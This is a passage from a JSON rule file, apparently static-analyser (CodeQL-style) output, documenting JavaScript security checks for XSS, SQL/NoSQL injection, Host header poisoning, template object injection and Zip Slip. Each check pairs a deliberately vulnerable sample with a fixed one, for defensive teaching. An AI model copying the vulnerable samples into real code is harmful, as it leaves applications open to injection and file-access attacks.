Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Reinterpreting text from an exception as HTML\n              can lead to a cross-site scripting vulnerability.","id":"js/xss-through-exception","kind":"path-problem","name":"Exception text reinterpreted as HTML","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/unsafe-jquery-plugin","name":"js/unsafe-jquery-plugin","shortDescription":{"text":"Unsafe jQuery plugin"},"fullDescription":{"text":"A jQuery plugin that unintentionally constructs HTML from some of its options may be unsafe to use for clients."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t    text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t    text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t    text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t    text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116","frameworks/jquery"],"description":"A jQuery plugin that unintentionally constructs HTML from some of its options may be unsafe to use for clients.","id":"js/unsafe-jquery-plugin","kind":"path-problem","name":"Unsafe jQuery plugin","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/xss","name":"js/xss","shortDescription":{"text":"Client-side cross-site scripting"},"fullDescription":{"text":"Writing user input directly to the DOM allows for a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n    var href = document.location.href,\n        deflt = href.substring(href.indexOf(\"default=\")+8);\n    document.write(\"<OPTION value=1>\"+deflt+\"</OPTION>\");\n    document.write(\"<OPTION value=2>English</OPTION>\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n    var href = document.location.href,\n        deflt = href.substring(href.indexOf(\"default=\")+8);\n    document.write(\"<OPTION value=1>\"+deflt+\"</OPTION>\");\n    document.write(\"<OPTION value=2>English</OPTION>\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Writing user input directly to the DOM allows for\n              a cross-site scripting vulnerability.","id":"js/xss","kind":"path-problem","name":"Client-side cross-site scripting","precision":"high","problem.severity":"error","security-severity":"7.8"}},{"id":"js/sql-injection","name":"js/sql-injection","shortDescription":{"text":"Database query built from user-controlled sources"},"fullDescription":{"text":"Building a database query from user-controlled sources is vulnerable to insertion of malicious code by the user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Database query built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // BAD: the category might have SQL special characters in it\n  var query1 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n    req.params.category +\n    \"' ORDER BY PRICE\";\n  pool.query(query1, [], function(err, results) {\n    // process results\n  });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // GOOD: use parameters\n  var query2 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n  pool.query(query2, [req.params.category], function(err, results) {\n    // process results\n  });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      SqlString = require('sqlstring'),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // GOOD: the category is escaped using mysql.escape\n  var query1 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n    SqlString.escape(req.params.category) +\n    \"' ORDER BY PRICE\";\n  pool.query(query1, [], function(err, results) {\n    // process results\n  });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n  \"Todo\",\n  new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n\n  await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n  res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n  await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n  res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n  if (typeof id !== \"string\") {\n    res.status(400).json({ status: \"error\" });\n    return;\n  }\n  await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n  res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n","markdown":"# Database query built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // BAD: the category might have SQL special characters in it\n  var query1 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n    req.params.category +\n    \"' ORDER BY PRICE\";\n  pool.query(query1, [], function(err, results) {\n    // process results\n  });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // GOOD: use parameters\n  var query2 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n  pool.query(query2, [req.params.category], function(err, results) {\n    // process results\n  });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      SqlString = require('sqlstring'),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // GOOD: the category is escaped using mysql.escape\n  var query1 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n    SqlString.escape(req.params.category) +\n    \"' ORDER BY PRICE\";\n  pool.query(query1, [], function(err, results) {\n    // process results\n  });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n  \"Todo\",\n  new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n\n  await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n  res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n  await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n  res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n  if (typeof id !== \"string\") {\n    res.status(400).json({ status: \"error\" });\n    return;\n  }\n  await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n  res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n"},"properties":{"tags":["security","external/cwe/cwe-089","external/cwe/cwe-090","external/cwe/cwe-943"],"description":"Building a database query from user-controlled sources is vulnerable to insertion of\n              malicious code by the user.","id":"js/sql-injection","kind":"path-problem","name":"Database query built from user-controlled sources","precision":"high","problem.severity":"error","security-severity":"8.8"}},{"id":"js/host-header-forgery-in-email-generation","name":"js/host-header-forgery-in-email-generation","shortDescription":{"text":"Host header poisoning in email generation"},"fullDescription":{"text":"Using the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n  let email = req.query.email;\n  let transport = nodemailer.createTransport(config.smtp);\n  let token = backend.getUserSecretResetToken(email);\n  transport.sendMail({\n    from: 'webmaster@example.com',\n    to: email,\n    subject: 'Forgot password',\n    text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n  });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n  let email = req.query.email;\n  let transport = nodemailer.createTransport(config.smtp);\n  let token = backend.getUserSecretResetToken(email);\n  transport.sendMail({\n    from: 'webmaster@example.com',\n    to: email,\n    subject: 'Forgot password',\n    text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n  });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n","markdown":"# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n  let email = req.query.email;\n  let transport = nodemailer.createTransport(config.smtp);\n  let token = backend.getUserSecretResetToken(email);\n  transport.sendMail({\n    from: 'webmaster@example.com',\n    to: email,\n    subject: 'Forgot password',\n    text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n  });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n  let email = req.query.email;\n  let transport = nodemailer.createTransport(config.smtp);\n  let token = backend.getUserSecretResetToken(email);\n  transport.sendMail({\n    from: 'webmaster@example.com',\n    to: email,\n    subject: 'Forgot password',\n    text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n  });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n"},"properties":{"tags":["security","external/cwe/cwe-640"],"description":"Using the HTTP Host header to construct a link in an email can facilitate phishing\n              attacks and leak password reset tokens.","id":"js/host-header-forgery-in-email-generation","kind":"path-problem","name":"Host header poisoning in email generation","precision":"high","problem.severity":"error","security-severity":"9.8"}},{"id":"js/template-object-injection","name":"js/template-object-injection","shortDescription":{"text":"Template Object Injection"},"fullDescription":{"text":"Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n    var profile = req.body.profile;\n    res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n    var profile = req.body.profile;\n    res.render('index', {\n        name: profile.name,\n        location: profile.location\n    });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n","markdown":"# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n    var profile = req.body.profile;\n    res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n    var profile = req.body.profile;\n    res.render('index', {\n        name: profile.name,\n        location: profile.location\n    });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n"},"properties":{"tags":["security","external/cwe/cwe-073","external/cwe/cwe-094"],"description":"Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution.","id":"js/template-object-injection","kind":"path-problem","name":"Template Object Injection","precision":"high","problem.severity":"error","security-severity":"9.3"}},{"id":"js/zipslip","name":"js/zipslip","shortDescription":{"text":"Arbitrary file access during archive extraction (\"Zip Slip\")"},"fullDescription":{"text":"Extracting files from a malicious ZIP file, or similar type of archive, without validating that the destination file path is within the destination directory can allow an attacker to unexpectedly gain access to resources."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n  .pipe(unzip.Parse())\n  .on('entry', entry => {\n    const fileName = entry.path;\n    // BAD: This could write any file on the filesystem.\n    entry.pipe(fs.createWriteStream(fileName));\n  });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n  .pipe(unzip.Parse())\n  .on('entry', entry => {\n    const fileName = entry.path;\n    // GOOD: ensures the path is safe to write to.\n    if (fileName.indexOf('..') == -1) {\n      entry.pipe(fs.createWriteStream(fileName));\n    }\n    else {\n      console.log('skipping bad path', fileName);\n    }\n  });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n","markdown":"# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n  